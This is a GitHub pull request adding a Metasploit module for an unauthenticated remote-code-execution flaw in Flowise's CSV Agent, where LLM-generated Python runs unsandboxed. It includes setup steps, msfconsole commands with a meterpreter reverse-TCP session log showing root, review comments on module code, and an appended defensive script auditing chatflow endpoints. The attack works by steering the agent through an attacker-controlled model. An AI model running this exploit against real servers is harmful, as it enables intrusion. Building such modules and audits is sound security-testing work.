Add Flowise CSV Agent Prompt Injection RCE module (CVE-2026-41264) #21407

Open
Takahiro-Yoko wants to merge 6 commits into rapid7:master from Takahiro-Yoko:flowise_auth_rce_cve_2026_41264

@Takahiro-Yoko
Contributor

CVE-2026-41264
GHSA-3hjv-c53m-58jj

Vulnerable Application

This vulnerability allows remote attackers to execute arbitrary code on affected installations of FlowiseAI Flowise.
Authentication is not required to exploit this vulnerability.

The specific flaw exists within the run method of the CSV_Agents class.
The issue results from the lack of proper sandboxing when evaluating an LLM generated python script.
An attacker can leverage this vulnerability to execute code in the context of the user running the server.

The vulnerability affects:

*  flowise <= 3.0.13
*  flowise-components <= 3.0.13

This module was successfully tested on:

* flowise 3.0.13 installed with Docker

Installation

  1. docker run --name flowise -p 3000:3000 flowiseai/flowise:3.0.13

  2. On an attacker machine

     curl -fsSL https://ollama.com/install.sh | sh
     ollama run llama3.1

  3. Create API Key (need chatflows:create permission for exploit to work)

Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: use exploit/multi/http/flowise_auth_rce_cve_2026_41264.rb
  4. Do: run lhost=<lhost> rhost=<rhost> apikey=<apikey> ollamaapiuri=<ollamaapiuri> model=<model>
  5. You should get a meterpreter

Scenarios

cmd/linux/http/x64/meterpreter_reverse_tcp

msf > use exploit/multi/http/flowise_auth_rce_cve_2026_41264.rb
[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
msf exploit(multi/http/flowise_auth_rce_cve_2026_41264) > run apikey=<apikey> rhost=192.168.56.17 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434  model=llama3.1
[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Flowise version 3.0.13 detected
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.17:33468) at 2026-05-05 14:09:24 +0900

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : acc229b14e46
OS           :  (Linux 6.8.0-52-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > 

Comment thread modules/exploits/multi/http/flowise_auth_rce_cve_2026_41264.rb Outdated
version = flowise_get_version
return CheckCode::Unknown('Could not retrieve Flowise version.') unless version

return CheckCode::Appears("Flowise version #{version} detected") if version <= Rex::Version.new('3.0.13')

Contributor

Is there a lower bound?

Contributor Author

Thanks! Although this has not been explicitly tested (yet), there appears to be no lower bound.

Contributor Author

It seems that the CSV Agent was first introduced in Flowise version 1.3.0, so the theoretical lower bound is 1.3.0.
Updated. dc9dd26 Thanks!

fail_with(Failure::Unknown, 'Failed to create a chatflow.') unless res.code == 200
@id = res.get_json_document['id']

send_request_cgi({
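
Review bot: `res.code == 200` on the first line dereferences `res` without a nil check, so when no response arrives (Metasploit's HTTP client returns nil in that case) the module raises NoMethodError instead of reaching `fail_with`. Use `res&.code == 200` in the guard, and fail with a clear message when `res.get_json_document['id']` is nil, since `@id` is assigned on the next line and a missing id would otherwise surface only in the following request.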

Contributor

Do we need to check the response here?

Contributor Author

Thanks! Updated. 8f03671

Takahiro-Yoko and others added 3 commits May 27, 2026 06:39

register_options([
OptString.new('APIKEY', [true, 'Flowise API Key (chatflows:create permission required)', '']),
OptString.new('OLLAMAAPIURI', [ true, 'Endpoint of the OLLAMA API controlled by an attacker', '' ]),
OptString.new('MODEL', [ true, 'Valid ollama model name', '' ]),

Contributor

If it can be nil, does it have to be mandatory?

Contributor Author

Good catch. I didn't realize that setting an empty string as the default value bypasses the required option check. These options are all mandatory, so I've removed the default empty values. 45394b3 Thanks!


register_options([
OptString.new('APIKEY', [true, 'Flowise API Key (chatflows:create permission required)', '']),
OptString.new('OLLAMAAPIURI', [ true, 'Endpoint of the OLLAMA API controlled by an attacker', '' ]),

Contributor
@msutovsky-r7 Jun 4, 2026

Is there a way to spoof the traffic between Ollama and Flowise? Asking because it might make the module more usable, and I am currently getting this error:

Error: predictionsServices.buildChatflow - fetch failed

Contributor Author

I haven't tested traffic spoofing between Ollama and Flowise, but standard interception/proxy tools may work.

Regarding the predictionsServices.buildChatflow - fetch failed error, please make sure that OLLAMAAPIURI includes the correct Ollama host and port. Since Ollama uses port 11434 by default, you may need to set it to:

http://<your_ollama_server_ip>:11434

For troubleshooting, it may also help to temporarily comment out the cleanup code so that you can inspect the created resources after the module runs.

Then:

  1. Open Flowise.
  2. Verify that the chatflow was created successfully.
  3. Check the chatflow configuration and confirm that the Ollama endpoint is set as expected.
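
As an added example (not part of the pull request or the module), the manual check in the last comment, confirming which Ollama endpoint a chatflow points at, can be run across exported chatflow records to flag CSV Agent flows whose model endpoint is not on an allowlist. The node type names `csvAgent` and `chatOllama`, the `baseUrl` input key, the `flowData`/`nodes` layout and the allowlist are assumptions; the sample records are constructed.

```ruby
require 'json'
require 'uri'

# Assumed Flowise identifiers (not from the page): node type names and the endpoint input key.
CSV_AGENT_NODE = 'csvAgent'
OLLAMA_NODE = 'chatOllama'
BASE_URL_KEY = 'baseUrl'
# Constructed allowlist of hosts where approved model servers run.
ALLOWED_MODEL_HOSTS = %w[localhost 127.0.0.1 ollama.internal.example].freeze

def host_of(url)
  URI.parse(url.to_s).host&.downcase
rescue URI::InvalidURIError
  nil
end

# Findings for one chatflow record; flowData may be a JSON string or an already parsed hash.
# Edges are not followed: any Ollama node in a flow that also holds a CSV agent is checked.
def audit_chatflow(record)
  flow = record['flowData']
  flow = JSON.parse(flow) if flow.is_a?(String)
  nodes = Array(flow.is_a?(Hash) ? flow['nodes'] : nil).map { |n| n['data'] || {} }
  return [] unless nodes.any? { |d| d['name'] == CSV_AGENT_NODE }

  nodes.select { |d| d['name'] == OLLAMA_NODE }.filter_map do |d|
    url = d.dig('inputs', BASE_URL_KEY)
    host = host_of(url)
    next if host && ALLOWED_MODEL_HOSTS.include?(host)

    reason = host ? 'model host not on allowlist' : 'missing or unparseable model endpoint'
    { id: record['id'], name: record['name'], base_url: url, reason: reason }
  end
rescue JSON::ParserError
  [{ id: record['id'], name: record['name'], base_url: nil, reason: 'flowData is not valid JSON' }]
end

def flow_data(*nodes)
  JSON.generate('nodes' => nodes.map { |name, inputs| { 'data' => { 'name' => name, 'inputs' => inputs } } })
end

# Constructed sample records; cf-2 uses the lab address from the Scenarios output.
SAMPLE_CHATFLOWS = [
  { 'id' => 'cf-1', 'name' => 'sales-report', 'flowData' => flow_data(['csvAgent', {}], ['chatOllama', { 'baseUrl' => 'http://localhost:11434' }]) },
  { 'id' => 'cf-2', 'name' => 'untitled', 'flowData' => flow_data(['csvAgent', {}], ['chatOllama', { 'baseUrl' => 'http://192.168.56.1:11434' }]) },
  { 'id' => 'cf-3', 'name' => 'chat-only', 'flowData' => flow_data(['chatOllama', { 'baseUrl' => 'http://203.0.113.9:11434' }]) },
  { 'id' => 'cf-4', 'name' => 'broken', 'flowData' => '{not json' }
].freeze

def audit_all(records)
  records.flat_map { |r| audit_chatflow(r) }
end

audit_all(SAMPLE_CHATFLOWS).each { |f| puts "#{f[:id]} #{f[:name]}: #{f[:reason]} (#{f[:base_url].inspect})" }
```

Records that cannot be parsed are reported rather than skipped, so a malformed export does not hide a flow from review.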
